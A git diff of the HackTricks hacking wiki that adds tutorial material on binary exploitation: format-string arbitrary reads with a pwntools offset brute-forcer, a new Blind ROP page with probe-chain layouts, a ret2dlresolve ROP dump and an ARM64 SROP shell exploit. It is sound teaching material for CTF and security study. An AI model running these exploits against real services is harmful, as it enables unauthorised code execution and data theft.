diff --git a/.gitbook/assets/image (1) (1) (1).png b/.gitbook/assets/image (1) (1) (1).png
index 1a985c3d4a3..e70bceed6fa 100644
Binary files a/.gitbook/assets/image (1) (1) (1).png and b/.gitbook/assets/image (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (1) (1).png b/.gitbook/assets/image (1) (1).png
index e70bceed6fa..ee37225244d 100644
Binary files a/.gitbook/assets/image (1) (1).png and b/.gitbook/assets/image (1) (1).png differ
diff --git a/.gitbook/assets/image (1).png b/.gitbook/assets/image (1).png
index ee37225244d..82f1650c7f3 100644
Binary files a/.gitbook/assets/image (1).png and b/.gitbook/assets/image (1).png differ
diff --git a/.gitbook/assets/image (2) (1).png b/.gitbook/assets/image (2) (1).png
index 6c2c20ea15d..70413c7fff3 100644
Binary files a/.gitbook/assets/image (2) (1).png and b/.gitbook/assets/image (2) (1).png differ
diff --git a/.gitbook/assets/image (2).png b/.gitbook/assets/image (2).png
index 70413c7fff3..f2f640d8cc9 100644
Binary files a/.gitbook/assets/image (2).png and b/.gitbook/assets/image (2).png differ
diff --git a/.gitbook/assets/image.png b/.gitbook/assets/image.png
index f2f640d8cc9..d798d9edcbc 100644
Binary files a/.gitbook/assets/image.png and b/.gitbook/assets/image.png differ
diff --git a/README.md b/README.md
index 09e208689e2..d1720d91b52 100644
--- a/README.md
+++ b/README.md
@@ -89,7 +89,7 @@ Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to
### [SerpApi](https://serpapi.com/)
-
+
SerpApi offers fast and easy real-time APIs to **access search engine results**. They scrape search engines, handle proxies, solve captchas, and parse all rich structured data for you.
diff --git a/SUMMARY.md b/SUMMARY.md
index 25bcc46e064..eb12c8af2e5 100644
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -698,6 +698,7 @@
* [Stack Pivoting - EBP2Ret - EBP chaining](binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md)
* [Uninitialized Variables](binary-exploitation/stack-overflow/uninitialized-variables.md)
* [ROP - Return Oriented Programing](binary-exploitation/rop-return-oriented-programing/README.md)
+ * [BROP - Blind Return Oriented Programming](binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.md)
* [Ret2csu](binary-exploitation/rop-return-oriented-programing/ret2csu.md)
* [Ret2dlresolve](binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md)
* [Ret2esp / Ret2reg](binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.md)
diff --git a/binary-exploitation/format-strings/README.md b/binary-exploitation/format-strings/README.md
index 09314cbeeef..27eb166c7fd 100644
--- a/binary-exploitation/format-strings/README.md
+++ b/binary-exploitation/format-strings/README.md
@@ -16,6 +16,8 @@
In C **`printf`** is a function that can be used to **print** some string. The **first parameter** this function expects is the **raw text with the formatters**. The **following parameters** expected are the **values** to **substitute** the **formatters** from the raw text.
+Other vulnerable functions are **`sprintf()`** and **`fprintf()`**.
+
The vulnerability appears when an **attacker text is used as the first argument** to this function. The attacker will be able to craft a **special input abusing** the **printf format** string capabilities to read and **write any data in any address (readable/writable)**. Being able this way to **execute arbitrary code**.
#### Formatters:
@@ -25,6 +27,7 @@ The vulnerability appears when an **attacker text is used as the first argument*
%d —> Entire
%u —> Unsigned
%s —> String
+%p —> Pointer
%n —> Number of written bytes
%hn —> Occupies 2 bytes instead of 4
$X —> Direct access, Example: ("%3$d", var1, var2, var3) —> Access to var3
@@ -53,6 +56,21 @@ printf("%x %x %x", value, value, value); // Outputs: 4b5 4b5 4b5
printf("%x %x %x", value); // Unexpected output: reads random values from the stack.
```
+* fprintf vulnerable:
+
+```c
+#include
+
+int main(int argc, char *argv[]) {
+ char *user_input;
+ user_input = argv[1];
+ FILE *output_file = fopen("output.txt", "w");
+ fprintf(output_file, user_input); // The user input cna include formatters!
+ fclose(output_file);
+ return 0;
+}
+```
+
### **Accessing Pointers**
The format **`%$x`**, where `n` is a number, allows to indicate to printf to select the n parameter (from the stack). So if you want to read the 4th param from the stack using printf you could do:
@@ -79,14 +97,14 @@ An attacker controlling this input, will be able to **add arbitrary address in t
## **Arbitrary Read**
-It's possible to use the formatter **`$n%s`** to make **`printf`** get the **address** situated in the **n position**, following it and **print it as if it was a string** (print until a 0x00 is found). So if the base address of the binary is **`0x8048000`**, and we know that the user input starts in the 4th position in the stack, it's possible to print the starting of the binary with:
+It's possible to use the formatter **`%n$s`** to make **`printf`** get the **address** situated in the **n position**, following it and **print it as if it was a string** (print until a 0x00 is found). So if the base address of the binary is **`0x8048000`**, and we know that the user input starts in the 4th position in the stack, it's possible to print the starting of the binary with:
```python
from pwn import *
p = process('./bin')
-payload = b'%6$p' #4th param
+payload = b'%6$s' #4th param
payload += b'xxxx' #5th param (needed to fill 8bytes with the initial input)
payload += p32(0x8048000) #6th param
@@ -95,9 +113,55 @@ log.info(p.clean()) # b'\x7fELF\x01\x01\x01||||'
```
{% hint style="danger" %}
-Note that you cannot put the address 0x8048000 at the begining of the input because the string will be cat in 0x00 at the end of that address.
+Note that you cannot put the address 0x8048000 at the beginning of the input because the string will be cat in 0x00 at the end of that address.
{% endhint %}
+### Find offset
+
+To find the offset to your input you could send 4 or 8 bytes (`0x41414141`) followed by **`%1$x`** and **increase** the value till retrieve the `A's`.
+
+
+
+Brute Force printf offset
+
+```python
+# Code from https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak
+
+from pwn import *
+
+# Iterate over a range of integers
+for i in range(10):
+ # Construct a payload that includes the current integer as offset
+ payload = f"AAAA%{i}$x".encode()
+
+ # Start a new process of the "chall" binary
+ p = process("./chall")
+
+ # Send the payload to the process
+ p.sendline(payload)
+
+ # Read and store the output of the process
+ output = p.clean()
+
+ # Check if the string "41414141" (hexadecimal representation of "AAAA") is in the output
+ if b"41414141" in output:
+ # If the string is found, log the success message and break out of the loop
+ log.success(f"User input is at offset : {i}")
+ break
+
+ # Close the process
+ p.close()
+```
+
+
+
+### How useful
+
+Arbitrary reads can be useful to:
+
+* **Dump** the **binary** from memory
+* **Access specific parts of memory where sensitive** **info** is stored (like canaries, encryption keys or custom passwords like in this [**CTF challenge**](https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak#read-arbitrary-value))
+
## **Arbitrary Write**
The formatter **`$%n`** **writes** the **number of written bytes** in the **indicated address** in the \ param in the stack. If an attacker can write as many char as he will with printf, he is going to be able to make **`$%n`** write an arbitrary number in an arbitrary address.
@@ -178,6 +242,7 @@ It's possible to abuse the write actions of a format string vulnerability to **w
* [https://ir0nstone.gitbook.io/notes/types/stack/format-string](https://ir0nstone.gitbook.io/notes/types/stack/format-string)
* [https://www.youtube.com/watch?v=t1LH9D5cuK4](https://www.youtube.com/watch?v=t1LH9D5cuK4)
+* [https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak](https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak)
* [https://guyinatuxedo.github.io/10-fmt\_strings/pico18\_echo/index.html](https://guyinatuxedo.github.io/10-fmt\_strings/pico18\_echo/index.html)
* 32 bit, no relro, no canary, nx, no pie, basic use of format strings to leak the flag from the stack (no need to alter the execution flow)
* [https://guyinatuxedo.github.io/10-fmt\_strings/backdoor17\_bbpwn/index.html](https://guyinatuxedo.github.io/10-fmt\_strings/backdoor17\_bbpwn/index.html)
diff --git a/binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.md b/binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.md
new file mode 100644
index 00000000000..37d9d0409b8
--- /dev/null
+++ b/binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.md
@@ -0,0 +1,149 @@
+# BROP - Blind Return Oriented Programming
+
+
+
+Learn AWS hacking from zero to hero withhtARTE (HackTricks AWS Red Team Expert)!
+
+Other ways to support HackTricks:
+
+* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+
+
+## Basic Information
+
+The goal of this attack is to be able to **abuse a ROP via a buffer overflow without any information about the vulnerable binary**.\
+This attack is based on the following scenario:
+
+* A stack vulnerability and knowledge of how to trigger it.
+* A server application that restarts after a crash.
+
+## Attack
+
+### **1. Find vulnerable offset** sending one more character until a malfunction of the server is detected
+
+### **2. Brute-force canary** to leak it
+
+### **3. Brute-force stored RBP and RIP** addresses in the stack to leak them
+
+You can find more information about these processes [here (BF Forked & Threaded Stack Canaries)](../common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md) and [here (BF Addresses in the Stack)](../common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md).
+
+### **4. Find the stop gadget**
+
+This gadget basically allows to confirm that something interesting was executed by the ROP gadget because the execution didn't crash. Usually, this gadget is going to be something that **stops the execution** and it's positioned at the end of the ROP chain when looking for ROP gadgets to confirm a specific ROP gadget was executed
+
+### **5. Find BROP gadget**
+
+This technique uses the [**ret2csu**](ret2csu.md) gadget. And this is because if you access this gadget in the middle of some instructions you get gadgets to control **`rsi`** and **`rdi`**:
+
+
+
+These would be the gadgets:
+
+* `pop rsi; pop r15; ret`
+* `pop rdi; ret`
+
+Notice how with those gadgets it's possible to **control 2 arguments** of a function to call.
+
+Also, notice that the ret2csu gadget has a **very unique signature** because it's going to be poping 6 registers from the stack. SO sending a chain like:
+
+`'A' * offset + canary + rbp + ADDR + 0xdead * 6 + STOP`
+
+If the **STOP is executed**, this basically means an **address that is popping 6 registers** from the stack was used. Or that the address used was also a STOP address.
+
+In order to **remove this last option** a new chain like the following is executed and it must not execute the STOP gadget to confirm the previous one did pop 6 registers:
+
+`'A' * offset + canary + rbp + ADDR`
+
+Knowing the address of the ret2csu gadget, it's possible to **infer the address of the gadgets to control `rsi` and `rdi`**.
+
+### 6. Find PLT
+
+The PLT table can be searched from 0x400000 or from the **leaked RIP address** from the stack (if **PIE** is being used). The **entries** of the table are **separated by 16B** (0x10B), and when one function is called the server doesn't crash even if the arguments aren't correct. Also, checking the address of a entry in the **PLT + 6B also doesn't crash** as it's the first code executed.
+
+Therefore, it's possible to find the PLT table checking the following behaviours:
+
+* `'A' * offset + canary + rbp + ADDR + STOP` -> no crash
+* `'A' * offset + canary + rbp + (ADDR + 0x6) + STOP` -> no crash
+* `'A' * offset + canary + rbp + (ADDR + 0x10) + STOP` -> no crash
+
+### 7. Finding strcmp
+
+The **`strcmp`** function sets the register **`rdx`** to the length of the string being compared. Note that **`rdx`** is the **third argument** and we need it to be **bigger than 0** in order to later use `write` to leak the program.
+
+It's possible to find the location of **`strcmp`** in the PLT based on its behaviour using the fact that we can now control the 2 first arguments of functions:
+
+* strcmp(\, \) -> crash
+* strcmp(\, \) -> crash
+* strcmp(\, \) -> crash
+* strcmp(\, \) -> no crash
+
+It's possible to check for this by calling each entry of the PLT table or by using the **PLT slow path** which basically consist on **calling an entry in the PLT table + 0xb** (which calls to **`dlresolve`**) followed in the stack by the **entry number one wishes to probe** (starting at zero) to scan all PLT entries from the first one:
+
+* strcmp(\, \) -> crash
+ * `b'A' * offset + canary + rbp + (BROP + 0x9) + RIP + (BROP + 0x7) + p64(0x300) + p64(0x0) + (PLT + 0xb ) + p64(ENTRY) + STOP` -> Will crash
+* strcmp(\, \) -> crash
+ * `b'A' * offset + canary + rbp + (BROP + 0x9) + p64(0x300) + (BROP + 0x7) + RIP + p64(0x0) + (PLT + 0xb ) + p64(ENTRY) + STOP`
+* strcmp(\, \) -> no crash
+ * `b'A' * offset + canary + rbp + (BROP + 0x9) + RIP + (BROP + 0x7) + RIP + p64(0x0) + (PLT + 0xb ) + p64(ENTRY) + STOP`
+
+Remember that:
+
+* BROP + 0x7 point to **`pop RSI; pop R15; ret;`**
+* BROP + 0x9 point to **`pop RDI; ret;`**
+* PLT + 0xb point to a call to **dl\_resolve**.
+
+Having found `strcmp` it's possible to set **`rdx`** to a value bigger than 0.
+
+{% hint style="success" %}
+Note that usually `rdx` will host already a value bigger than 0, so this step might not be necesary.
+{% endhint %}
+
+### 8. Finding Write or equivalent
+
+Finally, it's needed a gadget that exfiltrates data in order to exfiltrate the binary. And at this moment it's possible to **control 2 arguments and set `rdx` bigger than 0.**
+
+There are 3 common funtions taht could be abused for this:
+
+* `puts(data)`
+* `dprintf(fd, data)`
+* `write(fd, data, len(data)`
+
+However, the original paper only mentions the **`write`** one, so lets talk about it:
+
+The current problem is that we don't know **where the write function is inside the PLT** and we don't know **a fd number to send the data to our socket**.
+
+However, we know **where the PLT table is** and it's possible to find write based on its **behaviour**. And we can create **several connections** with the server an d use a **high FD** hoping that it matches some of our connections.
+
+Behaviour signatures to find those functions:
+
+* `'A' * offset + canary + rbp + (BROP + 0x9) + RIP + (BROP + 0x7) + p64(0) + p64(0) + (PLT + 0xb) + p64(ENTRY) + STOP` -> If there is data printed, then puts was found
+* `'A' * offset + canary + rbp + (BROP + 0x9) + FD + (BROP + 0x7) + RIP + p64(0x0) + (PLT + 0xb) + p64(ENTRY) + STOP` -> If there is data printed, then dprintf was found
+* `'A' * offset + canary + rbp + (BROP + 0x9) + RIP + (BROP + 0x7) + (RIP + 0x1) + p64(0x0) + (PLT + 0xb ) + p64(STRCMP ENTRY) + (BROP + 0x9) + FD + (BROP + 0x7) + RIP + p64(0x0) + (PLT + 0xb) + p64(ENTRY) + STOP` -> If there is data printed, then write was found
+
+## Automatic Exploitation
+
+* [https://github.com/Hakumarachi/Bropper](https://github.com/Hakumarachi/Bropper)
+
+## References
+
+* Original paper: [https://www.scs.stanford.edu/brop/bittau-brop.pdf](https://www.scs.stanford.edu/brop/bittau-brop.pdf)
+* [https://www.ctfrecipes.com/pwn/stack-exploitation/arbitrary-code-execution/code-reuse-attack/blind-return-oriented-programming-brop](https://www.ctfrecipes.com/pwn/stack-exploitation/arbitrary-code-execution/code-reuse-attack/blind-return-oriented-programming-brop)
+
+
+
+Learn AWS hacking from zero to hero withhtARTE (HackTricks AWS Red Team Expert)!
+
+Other ways to support HackTricks:
+
+* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+
diff --git a/binary-exploitation/rop-return-oriented-programing/ret2csu.md b/binary-exploitation/rop-return-oriented-programing/ret2csu.md
index 8d531328691..8204f3aed3d 100644
--- a/binary-exploitation/rop-return-oriented-programing/ret2csu.md
+++ b/binary-exploitation/rop-return-oriented-programing/ret2csu.md
@@ -14,7 +14,9 @@ Other ways to support HackTricks:
-## Basic Information
+##
+
+## [https://www.scs.stanford.edu/brop/bittau-brop.pdf](https://www.scs.stanford.edu/brop/bittau-brop.pdf)Basic Information
**ret2csu** is a hacking technique used when you're trying to take control of a program but can't find the **gadgets** you usually use to manipulate the program's behavior.
@@ -81,6 +83,18 @@ gef➤ search-pattern 0x400560
* `rbp` and `rbx` must have the same value to avoid the jump
* There are some omitted pops you need to take into account
+## RDI and RSI
+
+Another way to control **`rdi`** and **`rsi`** from the ret2csu gadget is by accessing it specific offsets:
+
+
+
+Check this page for more info:
+
+{% content-ref url="brop-blind-return-oriented-programming.md" %}
+[brop-blind-return-oriented-programming.md](brop-blind-return-oriented-programming.md)
+{% endcontent-ref %}
+
## Example
### Using the call
diff --git a/binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md b/binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md
index 2f31d64f966..3221520be8e 100644
--- a/binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md
+++ b/binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md
@@ -28,13 +28,14 @@ Usually, all these structures are faked by making an **initial ROP chain that ca
This technique is useful specially if there aren't syscall gadgets (to use techniques such as [**ret2syscall**](rop-syscall-execv/) or [SROP](srop-sigreturn-oriented-programming/)) and there are't ways to leak libc addresses.
{% endhint %}
-You can find a better explanation about this technique in the second half of the video:
+Chek this video for a nice explanation about this technique in the second half of the video:
{% embed url="https://youtu.be/ADULSwnQs-s?feature=shared" %}
-## Structures
+Or check these pages for a step-by-step explanation:
-It's necessary to fake 3 structures: **`JMPREL`**, **`STRTAB`** and **`SYMTAB`**. You have a better explanation about how these are built in [https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve#structures](https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve#structures)
+* [https://www.ctfrecipes.com/pwn/stack-exploitation/arbitrary-code-execution/code-reuse-attack/ret2dlresolve#how-it-works](https://www.ctfrecipes.com/pwn/stack-exploitation/arbitrary-code-execution/code-reuse-attack/ret2dlresolve#how-it-works)
+* [https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve#structures](https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve#structures)
## Attack Summary
@@ -44,6 +45,28 @@ It's necessary to fake 3 structures: **`JMPREL`**, **`STRTAB`** and **`SYMTAB`**
4. **Call** `_dl_runtime_resolve`
5. **`system`** will be resolved and called with `'/bin/sh'` as argument
+From the [**pwntools documentation**](https://docs.pwntools.com/en/stable/rop/ret2dlresolve.html), this is how a **`ret2dlresolve`** attack look like:
+
+```python
+context.binary = elf = ELF(pwnlib.data.elf.ret2dlresolve.get('amd64'))
+>>> rop = ROP(elf)
+>>> dlresolve = Ret2dlresolvePayload(elf, symbol="system", args=["echo pwned"])
+>>> rop.read(0, dlresolve.data_addr) # do not forget this step, but use whatever function you like
+>>> rop.ret2dlresolve(dlresolve)
+>>> raw_rop = rop.chain()
+>>> print(rop.dump())
+0x0000: 0x400593 pop rdi; ret
+0x0008: 0x0 [arg0] rdi = 0
+0x0010: 0x400591 pop rsi; pop r15; ret
+0x0018: 0x601e00 [arg1] rsi = 6299136
+0x0020: b'iaaajaaa'
+0x0028: 0x4003f0 read
+0x0030: 0x400593 pop rdi; ret
+0x0038: 0x601e48 [arg0] rdi = 6299208
+0x0040: 0x4003e0 [plt_init] system
+0x0048: 0x15670 [dlresolve index]
+```
+
## Example
### Pure Pwntools
diff --git a/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md b/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md
index 90105beb2e9..6b0c0951c19 100644
--- a/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md
+++ b/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md
@@ -105,7 +105,7 @@ p.sendline(payload)
p.interactive()
```
-Check also the [**exploit from here**](https://guyinatuxedo.github.io/16-srop/csaw19\_smallboi/index.html) where the binary was already calling `sigreturn` and therefore it's not needed to buil that with a **ROP**:
+Check also the [**exploit from here**](https://guyinatuxedo.github.io/16-srop/csaw19\_smallboi/index.html) where the binary was already calling `sigreturn` and therefore it's not needed to build that with a **ROP**:
```python
from pwn import *
@@ -152,6 +152,8 @@ target.interactive()
* 64 bits, no relro, no canary, nx, no pie. Simple buffer overflow abusing `gets` function with lack of gadgets that performs a [**ret2syscall**](../rop-syscall-execv/). The ROP chain writes `/bin/sh` in the `.bss` by calling gets again, it abuses the **`alarm`** function to set eax to `0xf` to call a **SROP** and execute a shell.
* [https://guyinatuxedo.github.io/16-srop/swamp19\_syscaller/index.html](https://guyinatuxedo.github.io/16-srop/swamp19\_syscaller/index.html)
* 64 bits assembly program, no relro, no canary, nx, no pie. The flow allows to write in the stack, control several registers, and call a syscall and then it calls `exit`. The selected syscall is a `sigreturn` that will set registries and move `eip` to call a previous syscall instruction and run `memprotect` to set the binary space to `rwx` and set the ESP in the binary space. Following the flow, the program will call read intro ESP again, but in this case ESP will be pointing to the next intruction so passing a shellcode will write it as the next instruction and execute it.
+* [https://www.ctfrecipes.com/pwn/stack-exploitation/arbitrary-code-execution/code-reuse-attack/sigreturn-oriented-programming-srop#disable-stack-protection](https://www.ctfrecipes.com/pwn/stack-exploitation/arbitrary-code-execution/code-reuse-attack/sigreturn-oriented-programming-srop#disable-stack-protection)
+ * SROP is used to give execution privileges (memprotect) to the place where a shellcode was placed.
diff --git a/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md b/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md
index 3577a698570..b7494b0b88d 100644
--- a/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md
+++ b/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md
@@ -46,7 +46,48 @@ clang -o srop srop.c -fno-stack-protector
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space # Disable ASLR
```
+## Exploit
+The exploit abuses the bof to return to the call to **`sigreturn`** and prepare the stack to call **`execve`** with a pointer to `/bin/sh`.
+
+{% hint style="danger" %}
+For some reason I don't know the call to **`sigreturn`** is not doing anything so it doesn't work.
+{% endhint %}
+
+```python
+from pwn import *
+
+p = process('./srop')
+elf = context.binary = ELF('./srop')
+libc = ELF("/usr/lib/aarch64-linux-gnu/libc.so.6")
+libc.address = 0x0000fffff7df0000 # ASLR disabled
+binsh = next(libc.search(b"/bin/sh"))
+
+print("/bin/sh in: " + hex(binsh))
+
+stack_offset = 72
+
+sigreturn = 0x00000000004006a0 # mov x0, #0x8b ; svc #0x0
+svc_call = 0x00000000004006a4 # svc #0x0
+
+
+frame = SigreturnFrame()
+frame.x8 = 0xdd # syscall number for execve
+frame.x0 = binsh # pointer to /bin/sh
+frame.x1 = 0x4343434343434343 # NULL
+frame.x2 = 0x0 # NULL
+frame.pc = svc_call
+
+payload = b'A' * stack_offset
+payload += p64(sigreturn)
+payload += b"B" * len(bytes(frame))
+
+with open("/tmp/i", "wb") as f:
+ f.write(payload)
+
+p.sendline(payload)
+p.interactive()
+```
diff --git a/generic-methodologies-and-resources/external-recon-methodology/README.md b/generic-methodologies-and-resources/external-recon-methodology/README.md
index 530242f5fbb..22b551ebff6 100644
--- a/generic-methodologies-and-resources/external-recon-methodology/README.md
+++ b/generic-methodologies-and-resources/external-recon-methodology/README.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
@@ -730,7 +730,7 @@ There are several tools out there that will perform part of the proposed actions
* All free courses of [**@Jhaddix**](https://twitter.com/Jhaddix) like [**The Bug Hunter's Methodology v4.0 - Recon Edition**](https://www.youtube.com/watch?v=p4JgIu1mceI)
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
diff --git a/generic-methodologies-and-resources/pentesting-methodology.md b/generic-methodologies-and-resources/pentesting-methodology.md
index 21863df480a..937e09f0dcd 100644
--- a/generic-methodologies-and-resources/pentesting-methodology.md
+++ b/generic-methodologies-and-resources/pentesting-methodology.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
@@ -150,7 +150,7 @@ Check also the page about [**NTLM**](../windows-hardening/ntlm/), it could be ve
* [**CBC-MAC**](../crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md)
* [**Padding Oracle**](../crypto-and-stego/padding-oracle-priv.md)
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
diff --git a/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/README.md b/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/README.md
index 925db79a2d2..3718738d472 100644
--- a/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/README.md
+++ b/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/README.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
@@ -133,7 +133,7 @@ However, in this kind of containers these protections will usually exist, but yo
You can find **examples** on how to **exploit some RCE vulnerabilities** to get scripting languages **reverse shells** and execute binaries from memory in [**https://github.com/carlospolop/DistrolessRCE**](https://github.com/carlospolop/DistrolessRCE).
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-pid-reuse.md b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-pid-reuse.md
index e4a5a26a876..a50f791718b 100644
--- a/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-pid-reuse.md
+++ b/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-pid-reuse.md
@@ -291,6 +291,10 @@ int main(int argc, const char * argv[]) {
{% endtab %}
{% endtabs %}
+## Other examples
+
+* [https://gergelykalman.com/why-you-shouldnt-use-a-commercial-vpn-amateur-hour-with-windscribe.html](https://gergelykalman.com/why-you-shouldnt-use-a-commercial-vpn-amateur-hour-with-windscribe.html)
+
## Refereces
* [https://wojciechregula.blog/post/learn-xpc-exploitation-part-2-say-no-to-the-pid/](https://wojciechregula.blog/post/learn-xpc-exploitation-part-2-say-no-to-the-pid/)
diff --git a/network-services-pentesting/pentesting-snmp/README.md b/network-services-pentesting/pentesting-snmp/README.md
index cb4e39f7d3b..7e2d77e7e27 100644
--- a/network-services-pentesting/pentesting-snmp/README.md
+++ b/network-services-pentesting/pentesting-snmp/README.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
@@ -260,7 +260,7 @@ If there is an ACL that only allows some IPs to query the SMNP service, you can
* snmpd.conf
* snmp-config.xml
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
diff --git a/network-services-pentesting/pentesting-snmp/cisco-snmp.md b/network-services-pentesting/pentesting-snmp/cisco-snmp.md
index 8161c6562ef..9bb61797b4b 100644
--- a/network-services-pentesting/pentesting-snmp/cisco-snmp.md
+++ b/network-services-pentesting/pentesting-snmp/cisco-snmp.md
@@ -12,7 +12,7 @@
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
@@ -53,7 +53,7 @@ msf6 auxiliary(scanner/snmp/snmp_enum) > exploit
* [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
diff --git a/network-services-pentesting/pentesting-web/README.md b/network-services-pentesting/pentesting-web/README.md
index 846e1591e98..acbaa6fa381 100644
--- a/network-services-pentesting/pentesting-web/README.md
+++ b/network-services-pentesting/pentesting-web/README.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
@@ -364,7 +364,7 @@ Find more info about web vulns in:
You can use tools such as [https://github.com/dgtlmoon/changedetection.io](https://github.com/dgtlmoon/changedetection.io) to monitor pages for modifications that might insert vulnerabilities.
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
diff --git a/network-services-pentesting/pentesting-web/jira.md b/network-services-pentesting/pentesting-web/jira.md
index 60b79b2b5d4..87e1de4ca80 100644
--- a/network-services-pentesting/pentesting-web/jira.md
+++ b/network-services-pentesting/pentesting-web/jira.md
@@ -14,7 +14,7 @@ Other ways to support HackTricks:
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
@@ -80,7 +80,7 @@ curl https://jira.some.example.com/rest/api/2/mypermissions | jq | grep -iB6 '"h
* [https://github.com/0x48piraj/Jiraffe](https://github.com/0x48piraj/Jiraffe)
* [https://github.com/bcoles/jira\_scan](https://github.com/bcoles/jira\_scan)
-
+
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
diff --git a/pentesting-web/file-upload/README.md b/pentesting-web/file-upload/README.md
index 7a48c67a20e..0107816ab9e 100644
--- a/pentesting-web/file-upload/README.md
+++ b/pentesting-web/file-upload/README.md
